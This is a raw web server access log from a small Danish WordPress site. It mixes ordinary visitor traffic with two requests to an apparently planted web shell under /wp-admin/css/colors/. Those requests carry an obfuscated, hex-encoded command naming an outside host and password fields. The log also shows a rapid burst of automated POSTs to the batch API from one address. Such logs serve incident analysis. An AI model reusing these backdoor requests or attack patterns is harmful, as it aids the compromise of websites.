185.21.40.28 - - [26/Jul/2026:11:19:24 +0200] "GET /wp-admin/css/colors/blue/blue/index.php?ARRAY=7o2230223n313738353036313136342p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035373536342q6339373335633834353430346136313935346666653662623639623563336166222p2232223n226130343032313038333339313131633438353831363530643663643033656233222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q33362q35332q36352q37382q38342q3234227q HTTP/1.1" 500 567 "-" "-"
45.148.10.21 - - [26/Jul/2026:11:21:24 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:25 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:25 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:26 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:26 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:27 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:27 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:27 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:28 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:28 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:28 +0200] "GET / HTTP/2" 200 9695 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:29 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:29 +0200] "GET /wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.6 HTTP/2" 200 1581 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:29 +0200] "GET /wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.6 HTTP/2" 200 1126 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:29 +0200] "GET /wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.6 HTTP/2" 200 1261 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:29 +0200] "GET /wp-content/themes/aveo-child/style.css?ver=1.0 HTTP/2" 200 157 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:29 +0200] "GET /wp-content/uploads/Store-Bors_logo.pdf-e1741348981822.png HTTP/2" 200 10688 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:29 +0200] "GET /wp-content/uploads/293006886_444632037668718_6687121733741693462_n-e1739796576350.jpg HTTP/2" 200 86919 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:29 +0200] "GET /wp-content/uploads/289533738_427589229372999_8125071229087909051_n-e1739796940504.jpg HTTP/2" 200 143956 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:29 +0200] "GET /wp-content/uploads/IMG_2013-scaled.jpg HTTP/2" 200 289767 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:29 +0200] "GET /wp-includes/js/wp-emoji-release.min.js?ver=6.9.1 HTTP/3" 200 4949 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:29 +0200] "GET /wp-content/uploads/wine-glass-light.svg HTTP/3" 200 325 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:29 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:29 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:30 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:30 +0200] "GET /wp-content/uploads/IMG_4410-scaled.jpg HTTP/3" 200 302935 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:30 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:31 +0200] "GET /wp-content/uploads/IMG_4380-scaled.jpg HTTP/3" 200 82143 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:31 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:31 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:32 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:32 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:33 +0200] "GET /wp-content/uploads/IMG_2034-scaled.jpg HTTP/3" 200 107265 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:34 +0200] "GET /wp-content/uploads/IMG_4387-scaled.jpg HTTP/3" 200 114199 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:34 +0200] "GET /wp-content/uploads/IMG_2028-scaled.jpg HTTP/3" 200 148896 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:33 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:34 +0200] "GET /wp-content/uploads/IMG_2023-scaled.jpg HTTP/3" 200 278393 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:34 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:35 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:35 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:36 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:36 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:37 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
37.96.119.192 - - [26/Jul/2026:11:21:36 +0200] "GET /kontakt-os/ HTTP/3" 200 8492 "https://store-bors.dk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Mobile Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:37 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:37 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:38 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:38 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
43.131.45.213 - - [26/Jul/2026:11:21:38 +0200] "GET / HTTP/1.1" 200 11257 "http://storebors.dk" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.148.10.21 - - [26/Jul/2026:11:21:39 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:39 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:40 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:40 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:40 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:41 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:41 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:42 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:42 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:43 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:43 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:43 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:44 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:44 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:45 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
185.21.40.28 - - [26/Jul/2026:11:19:45 +0200] "GET /wp-admin/css/colors/blue/blue/index.php?ARRAY=7o2230223n313738353036313138352p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353035373538352q6331373536666661336565653639623730386165646536393936343431646363222p2232223n226130343032313038333339313131633438353831363530643663643033656233222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q33362q35332q36352q37382q38342q3234227q HTTP/1.1" 500 567 "-" "-"
45.148.10.21 - - [26/Jul/2026:11:21:45 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:46 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:46 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:47 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:47 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:47 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:48 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:48 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:49 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:49 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:50 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:50 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:51 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:51 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:52 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:52 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:53 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:53 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:53 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:54 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:54 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:55 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:55 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:56 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:56 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:57 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:57 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:58 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:58 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1297 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:59 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:21:59 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:00 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:00 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:01 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:01 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:02 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:02 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:02 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:03 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1295 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:03 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 1296 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.148.10.21 - - [26/Jul/2026:11:22:04 +0200] "POST /wp-json/batch/v1 HTTP/1.1" 207 913 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
